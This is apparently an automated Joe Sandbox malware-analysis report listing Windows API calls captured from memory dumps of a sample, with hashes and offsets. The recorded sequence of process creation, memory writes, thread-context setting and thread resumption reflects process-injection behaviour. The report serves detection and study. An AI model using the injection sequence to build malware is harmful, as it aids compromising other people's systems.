                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030DF201,00000800,00000000,00000000), ref: 030DF412
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095838772.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_30d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B72E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 917628113fee4d5083c47f62af9994f24250e4e385b7b73003a1cdc94976cebd
                        • Instruction ID: 8eae8f411723dc8f31d8f496277d0ea3980e92ac617e657d47b5a22eb7fe351c
                        • Opcode Fuzzy Hash: 917628113fee4d5083c47f62af9994f24250e4e385b7b73003a1cdc94976cebd
                        • Instruction Fuzzy Hash: 191137B19002499FCB20DFAAC845ADFBFF5EF88320F24841AE519A7350C779A544DFA0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 5d768a86c82fea2f2d09849ea03298aad1d16cfdee1f1e6a6478f650ef57c30c
                        • Instruction ID: 22c48568c568db87d789fc2f2364ed61c3a6d7410e3a0ddfb90590307a429831
                        • Opcode Fuzzy Hash: 5d768a86c82fea2f2d09849ea03298aad1d16cfdee1f1e6a6478f650ef57c30c
                        • Instruction Fuzzy Hash: 861128B19003498BDB24DFAAC8457DEFBF9AF88324F24841AD519A7340C779A544CBA4
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 030DF186
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095838772.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_30d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 81cd14f14fa065e8f4878a29ecfd2f2a41292753de5b84a86004d48520e10495
                        • Instruction ID: 6fe3cfae57744a3a6a56e58c81a68e84df7772136fd04fdfad647147109fb119
                        • Opcode Fuzzy Hash: 81cd14f14fa065e8f4878a29ecfd2f2a41292753de5b84a86004d48520e10495
                        • Instruction Fuzzy Hash: 1C11DFB5C0074A8FCB10DF9AD944A9EFBF9AF88324F24C41AD429A7610C379A545CFA5
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076BBA55
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 45a56891c0eac56d0b6ede573495446af3ab0cb9bce42b9b2d0c2a8effa4e237
                        • Instruction ID: c29ddbc20a64402770479935078d39ccc9d552b051e95653470427898f52400a
                        • Opcode Fuzzy Hash: 45a56891c0eac56d0b6ede573495446af3ab0cb9bce42b9b2d0c2a8effa4e237
                        • Instruction Fuzzy Hash: B21106B5800749DFDB20DF9AC885BDEBBF8EB49324F208419E519A7700C379A944CFA5
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076BBA55
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: b215d9aa40dc13cd3b0d1d9fda433d75b258fa54d4dba909c6ba1b93842719f4
                        • Instruction ID: 00cc54dcefb21ddbfe8fdb2ef76c28b8fde3d36decec83181c675ecd86151e21
                        • Opcode Fuzzy Hash: b215d9aa40dc13cd3b0d1d9fda433d75b258fa54d4dba909c6ba1b93842719f4
                        • Instruction Fuzzy Hash: F91113B5800349DFCB20CF9AD885BDEBBF8EB48320F20840AD518A7600C379A584CFA5

                        Execution Graph

                        Execution Coverage:15%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:99
                        Total number of Limit Nodes:8
                        APIs
                        • CopyFileW.KERNELBASE(?,00000000,?), ref: 06ADF3F9
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225079622.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6ad0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: CopyFile
                        • String ID:
                        • API String ID: 1304948518-0
                        • Opcode ID: f48fa610bb1da94866e99de1c79aec8a74b0149a2a48ef373c194bfe65a33997
                        • Instruction ID: b1fbceaa475a67f457167682e9eaaf1e5d08aa93f645cf62b81e98044503322d
                        • Opcode Fuzzy Hash: f48fa610bb1da94866e99de1c79aec8a74b0149a2a48ef373c194bfe65a33997
                        • Instruction Fuzzy Hash: B7315CB1C012199FCB50CF9AD4847EEFBF4EF48320F15816AE919AB345D3349940CBA4
                        APIs
                        • CopyFileW.KERNELBASE(?,00000000,?), ref: 06ADF3F9
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225079622.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6ad0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: CopyFile
                        • String ID:
                        • API String ID: 1304948518-0
                        • Opcode ID: 6b1ae46be1594ed81ffc8297451b8d52b542e4de990192311a359c48dd799fe0
                        • Instruction ID: 43b5d9c6adae9240a15aa5b6120d0208d3559071acf0911d66ad81c654259611
                        • Opcode Fuzzy Hash: 6b1ae46be1594ed81ffc8297451b8d52b542e4de990192311a359c48dd799fe0
                        • Instruction Fuzzy Hash: 89214BB2C012199FCB50CFAAD5847DEFBF5EF48320F15816AE819AB345D3759A40CBA0
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 017D0D47
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207567972.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_17d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: 3cb4dd575af04381a900caa37d7144c4f67ede2ecb421f6791e6cac7722d3ee6
                        • Instruction ID: 109394e0171e535947e90854ccc16ce584585b78f52637d5bdcea38607d785ec
                        • Opcode Fuzzy Hash: 3cb4dd575af04381a900caa37d7144c4f67ede2ecb421f6791e6cac7722d3ee6
                        • Instruction Fuzzy Hash: 811149B1D003498FDB24DFAAC8457EEFFF4EF88324F24845AD519A7250C675A944CB90
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,06AD74A6), ref: 06AD7656
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225079622.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6ad0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 08482d0d607496c7e568392029a76549230b858bce9b04b52ff2d7730372dbc3
                        • Instruction ID: eca1f90396de9e1359aaf19e1a08c547624bd149dd01e0642dc110a001ea8c2b
                        • Opcode Fuzzy Hash: 08482d0d607496c7e568392029a76549230b858bce9b04b52ff2d7730372dbc3
                        • Instruction Fuzzy Hash: 621112B1C002498FCB24DF9AC848A9EFBF4EF88220F14845AD42AA7200D775A545CFA5
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,06AD74A6), ref: 06AD7656
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225079622.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6ad0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 51cb2be7d19960b51ed19a796977eb9db41a628d4f1006d6b9e4d62191fdfb89
                        • Instruction ID: fa1463a080f031945e45bb1ea61cb743111fc7281063cd8bdc3e1f8211203c26
                        • Opcode Fuzzy Hash: 51cb2be7d19960b51ed19a796977eb9db41a628d4f1006d6b9e4d62191fdfb89
                        • Instruction Fuzzy Hash: 651112B5C002498FDB14DF9AC944ADEFBF4AF88210F24885AD46AB7610D374A546CFA0
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 017D0D47
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207567972.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_17d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: 4794ffe352357e73f2d1b25b63e2a2d60bb57306adcef3f5062175a3ea501495
                        • Instruction ID: dc581e6eb7134f0932afe62d99488f3046041a4aa0673f1c5e991b5b9dbe32dc
                        • Opcode Fuzzy Hash: 4794ffe352357e73f2d1b25b63e2a2d60bb57306adcef3f5062175a3ea501495
                        • Instruction Fuzzy Hash: 1711F5B1D002498FDB24DFAAC44979EFFF5AB48324F24845AD519A7240C679A544CBA1
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 48c9163453c2190c09303ca6f3a7425d13715ea7e0cd5c8835a63ee49ab1cade
                        • Instruction ID: ab6ae421d844cec09d0cd2f0db04ca705265ddbf661c8d75fd5692c858089f79
                        • Opcode Fuzzy Hash: 48c9163453c2190c09303ca6f3a7425d13715ea7e0cd5c8835a63ee49ab1cade
                        • Instruction Fuzzy Hash: A3D1BFB0B042559FDB41EF68C845A6EBBF2FF85700F14809AE5068F3A2CB719C45CB92
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f025b439747178f3fc887a7d5d2cd598c7d1ea8ae8682f0041af0d22b3051648
                        • Instruction ID: c1b30109c33bc05677b11e4b0bec5c1775be65238876840a825ea96acd753182
                        • Opcode Fuzzy Hash: f025b439747178f3fc887a7d5d2cd598c7d1ea8ae8682f0041af0d22b3051648
                        • Instruction Fuzzy Hash: 115108B2B142669FCB549E6DC84056AF7E6FFC6211B1481BAEA09C7211EF31C845C7A1
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8828765685c4e700ebb11e2711cd67d0a1e7084602f8dcc221534ff1c35138fb
                        • Instruction ID: 5629f1be3cd3460aace524501e602147f20f49d4b0310ccf28a30dd70be4cebb
                        • Opcode Fuzzy Hash: 8828765685c4e700ebb11e2711cd67d0a1e7084602f8dcc221534ff1c35138fb
                        • Instruction Fuzzy Hash: 84512075B102199FCB54DF69C89499EBBF2FF88710B1580A9E909EB361DB30ED05CB50
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207085557.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_177d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c07808b8becefc5bf50830e4aad7ac51e59164e456044fc1f3bc0b604d1cc346
                        • Instruction ID: 3e0565ade6e2e2444dea705da666c5585708dfcc464d3adb5d396747201db9a8
                        • Opcode Fuzzy Hash: c07808b8becefc5bf50830e4aad7ac51e59164e456044fc1f3bc0b604d1cc346
                        • Instruction Fuzzy Hash: 6A21C7B2504244DFDF26DF54D9C0B26FF65FF88314F24C5A9E9091A256C336D416CB61
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207162787.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_178d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e433cadf669846955768b1264dbfad185cc705dd7424700715e411c4895619e4
                        • Instruction ID: 412a498124c23d58bbd0c54f5404cea240d30f04ce97eda8f40750e5e8e84b4a
                        • Opcode Fuzzy Hash: e433cadf669846955768b1264dbfad185cc705dd7424700715e411c4895619e4
                        • Instruction Fuzzy Hash: 8921F5B1544200EFDB25EF98C5C4B26FB65FB84318F34C9AED90D4B296C736D446CA62
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207162787.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_178d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a38855422ecd7b3c149dfaa9f3d1a83611e59e2088b5f65d18d4b80499d8626
                        • Instruction ID: 1044fd422c0e322b5233156ca8406ab23bf1316b2dd10398dd886a62a3404f53
                        • Opcode Fuzzy Hash: 2a38855422ecd7b3c149dfaa9f3d1a83611e59e2088b5f65d18d4b80499d8626
                        • Instruction Fuzzy Hash: 9D215BB1544204EFDB25EF58D9C0B2AFF65FB84324F24C56DE8494B686C33AD446CAB1
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207085557.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_177d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad2dec59e3151889acede25dbdc09f1e0996748c90a37620c8196c664727292b
                        • Instruction ID: 821bbc68116d35188f2d6c2d579b7736993880c2d1b5d577434b32af59d00d4a
                        • Opcode Fuzzy Hash: ad2dec59e3151889acede25dbdc09f1e0996748c90a37620c8196c664727292b
                        • Instruction Fuzzy Hash: 1321CD72504280DFCF16CF44E9C0B16BF72FF88314F2886A9D9480A656C33AD426CB91
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cafd8deb662fab6c047b3ef731b57fa6a0866c4326863cba20ed3f63ddbd0da3
                        • Instruction ID: b9ace11a4b0f83848b580f748c1e5d0e9ea8aeda6b2f8ad1d91ec0b975c047ba
                        • Opcode Fuzzy Hash: cafd8deb662fab6c047b3ef731b57fa6a0866c4326863cba20ed3f63ddbd0da3
                        • Instruction Fuzzy Hash: 980126767101728BCB54856E9400836B7EACBD522A318807BCA1EC3300EA32C842CA91
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207162787.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_178d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
                        • Instruction ID: caa981f03669699bda1a9fc9cf477ace87b85b993f3b6453b713fe88e468c1bf
                        • Opcode Fuzzy Hash: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
                        • Instruction Fuzzy Hash: C7110475544280CFDB12DF14D5C0B19FF72FB84324F24C6AAD8494BA86C33AD44ACBA1
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207162787.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_178d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                        • Instruction ID: 69ba610e276bb21500b038b5efa80645272327fa79e81456a1adee78c8b89ec7
                        • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                        • Instruction Fuzzy Hash: 6411BB75544280CFDB12DF54C5C4B15FBA2FB88218F34C6AAD8494B696C33AD44ACB62
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 873239ca661b9ccd5f690441870f2ed59bda0db56e784f56d84624124ac52c58
                        • Instruction ID: 83157d870722af08ae575e7fcb188d1fecec4295cf969d09935852d0a510a9d5
                        • Opcode Fuzzy Hash: 873239ca661b9ccd5f690441870f2ed59bda0db56e784f56d84624124ac52c58
                        • Instruction Fuzzy Hash: DCF0507B6043E28FC7060A2998005A57FB9DF8622575D40E7D54EC7212F7269817CFA2
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID: $sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                        • API String ID: 0-3003498
                        • Opcode ID: 71079fd3cc3f8ae9ba483ff03f0da262b9d8093796308eb8eb612b9b624c16bf
                        • Instruction ID: 48f376c219b3948882b7562d71accfe5eae1055bc9f43bca75ff5a6b485530db
                        • Opcode Fuzzy Hash: 71079fd3cc3f8ae9ba483ff03f0da262b9d8093796308eb8eb612b9b624c16bf
                        • Instruction Fuzzy Hash: 32B1BE70B142569FDB44EB69C844A7EBBF6FF88210F1484AAD40ACB3A1DB35DC41CB91

                        Execution Graph

                        Execution Coverage:12%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:178
                        Total number of Limit Nodes:12

                        Control-flow Graph

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076C77F6
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: bcbe95181ee7333480704f7cf815f581e82e5d8f6a5b749ae2ff87eb936f787a
                        • Instruction ID: 04420b43776e539e6d1eef071e47571b548cf6abfb2c67b384ab7c9d7c11b480
                        • Opcode Fuzzy Hash: bcbe95181ee7333480704f7cf815f581e82e5d8f6a5b749ae2ff87eb936f787a
                        • Instruction Fuzzy Hash: 3FA14BB1D0021ADFDF24CF69C9417EDBBB6EF48310F1485AAE819A7240DB749985CF91

                        Control-flow Graph

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076C77F6
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 5d2600101c9c695e17f37eaedff60e659c02fda72e217332fd88c5b2f7a6b580
                        • Instruction ID: 0ac232e44f4289f156d4d95e868ded22ff16b59dc30ab8b90312551c15311274
                        • Opcode Fuzzy Hash: 5d2600101c9c695e17f37eaedff60e659c02fda72e217332fd88c5b2f7a6b580
                        • Instruction Fuzzy Hash: FA913CB1D0021ADFDF24CF69C941BADBBB6FF48310F1485A9E819A7240DB749985CF91

                        Control-flow Graph

                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E0F186
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195531275.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2e00000_WltfeVzR.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: e048aa5c759243b6c3099036a9904737d67966be0444b1d9680500237237b9d3
                        • Instruction ID: 4486afbd78bb113f4f75824b7f586ce21e4c9d61ac374bc7729d881e752cec2d
                        • Opcode Fuzzy Hash: e048aa5c759243b6c3099036a9904737d67966be0444b1d9680500237237b9d3
                        • Instruction Fuzzy Hash: AC7139B0A00B058FDB64DF2AD48475ABBF1FF88304F04892DD446D7A90DB75E896CB91

                        Control-flow Graph

                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02E059C9
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195531275.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2e00000_WltfeVzR.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: d0adbf4ee0106a116fbc0d2df17cc495bd47aab1fe581a4cb12e25728dffa470
                        • Instruction ID: 5c91bfb37d40e2ab3d90ebdfb538f2b45aa0cdbabb93eca2bbf06b959bba8c63
                        • Opcode Fuzzy Hash: d0adbf4ee0106a116fbc0d2df17cc495bd47aab1fe581a4cb12e25728dffa470
                        • Instruction Fuzzy Hash: 6641D2B0C0061DCADB24DFAAC984B8EBBF5FF48304F60845AD408AB255DB75694ACF90

                        Control-flow Graph

                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02E059C9
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195531275.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2e00000_WltfeVzR.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 6c7110f4d6fa3c5be5901b8c7d48a9b56e36e2bbd3ef783c1038ef09ad9cf8c6
                        • Instruction ID: df7046ba7a8a8f88849e9998ebf486e63c616c416d598ca3f994c1a549f002db
                        • Opcode Fuzzy Hash: 6c7110f4d6fa3c5be5901b8c7d48a9b56e36e2bbd3ef783c1038ef09ad9cf8c6
                        • Instruction Fuzzy Hash: 5A41C2B0C0061DCBDB24DFAAC984B9EBBF5FF49304F60845AD408AB255DB75694ACF90

                        Control-flow Graph

                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076C73C8
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 3a81b77e2b245fc03b5e9df7280540ff7c69e0d29007f1229bd3e118e5826e0e
                        • Instruction ID: 48cae920a128746918cfbac5b6aaab2b65ae55b528090871f296f69417dee16a
                        • Opcode Fuzzy Hash: 3a81b77e2b245fc03b5e9df7280540ff7c69e0d29007f1229bd3e118e5826e0e
                        • Instruction Fuzzy Hash: 12214BB19003499FDB10CFA9D881BEEBBF5FF48320F10882AE919A7340D7749540CBA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 844 76c7338-76c7386 846 76c7388-76c7394 844->846 847 76c7396-76c73d5 WriteProcessMemory 844->847 846->847 849 76c73de-76c740e 847->849 850 76c73d7-76c73dd 847->850 850->849
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076C73C8
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: e6ad6635f4da971a2ee901dfeb5dc203826dd974683d0f749d80a37a08c0c457
                        • Instruction ID: 2fe2e59919dadce3c3d4225f06f9f7712811e93c4f74557702e1a6d956801876
                        • Opcode Fuzzy Hash: e6ad6635f4da971a2ee901dfeb5dc203826dd974683d0f749d80a37a08c0c457
                        • Instruction Fuzzy Hash: 522128B19003599FCB10CFA9C985BEEBBF5FF48310F108829E919A7340D7789944DBA4

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 854 76c7420-76c74b5 ReadProcessMemory 857 76c74be-76c74ee 854->857 858 76c74b7-76c74bd 854->858 858->857
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076C74A8
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 0ec51c07dbbe895cb55a37a9caeb4dd003747664cfdf715b23706518bdf4608c
                        • Instruction ID: 04eb78e0ef3632d667df5fc3f9efac6070903b300fd5c493dd22c53e5a7d55d5
                        • Opcode Fuzzy Hash: 0ec51c07dbbe895cb55a37a9caeb4dd003747664cfdf715b23706518bdf4608c
                        • Instruction Fuzzy Hash: 922139B1D003099FCB10CFA9C981AEEBBF5FF48320F20882AE519A7640C7399504DBA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 862 76c7199-76c71eb 864 76c71ed-76c71f9 862->864 865 76c71fb-76c722b Wow64SetThreadContext 862->865 864->865 867 76c722d-76c7233 865->867 868 76c7234-76c7264 865->868 867->868
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076C721E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 4990b4568f010810d8c03521b5fe23826f2bbc456f8642d085ec124ec81dbba9
                        • Instruction ID: 81fd558146d9620aecc412f5da06592ae6805e9444d34c729aa226f64abe2d41
                        • Opcode Fuzzy Hash: 4990b4568f010810d8c03521b5fe23826f2bbc456f8642d085ec124ec81dbba9
                        • Instruction Fuzzy Hash: 5D2107B59003098FDB14CFAAC5857EEBBF4EF48324F24842AD559A7240C7789945CFA1
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076C74A8
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
